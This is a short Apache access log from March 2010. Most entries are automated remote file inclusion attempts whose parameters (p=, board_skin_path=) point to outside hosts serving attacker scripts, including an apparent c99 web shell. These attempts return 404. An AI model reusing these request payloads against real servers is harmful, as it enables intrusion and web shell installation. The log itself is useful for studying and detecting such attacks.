72.29.80.127 - - [19/Mar/2010:03:13:25 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/Mar/2010:03:13:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [19/Mar/2010:03:13:30 -0400] "GET /logs/error_log.Q109071400 HTTP/1.1" 200 3225177 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.110.196.60 - - [19/Mar/2010:03:13:50 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
212.241.177.123 - - [19/Mar/2010:03:14:10 -0400] "GET /logs///write_comment_update.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:03:14:10 -0400] "GET ///write_comment_update.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:03:14:10 -0400] "GET /logs/access_log.Q110020100%20%20///write_comment_update.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
70.98.34.37 - - [19/Mar/2010:03:14:21 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
88.84.95.167 - - [19/Mar/2010:03:14:28 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.76.12.197 - - [19/Mar/2010:03:15:03 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
212.241.177.123 - - [19/Mar/2010:03:15:07 -0400] "GET /logs/access_log.Q110020800%20%20///write_comment_update.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
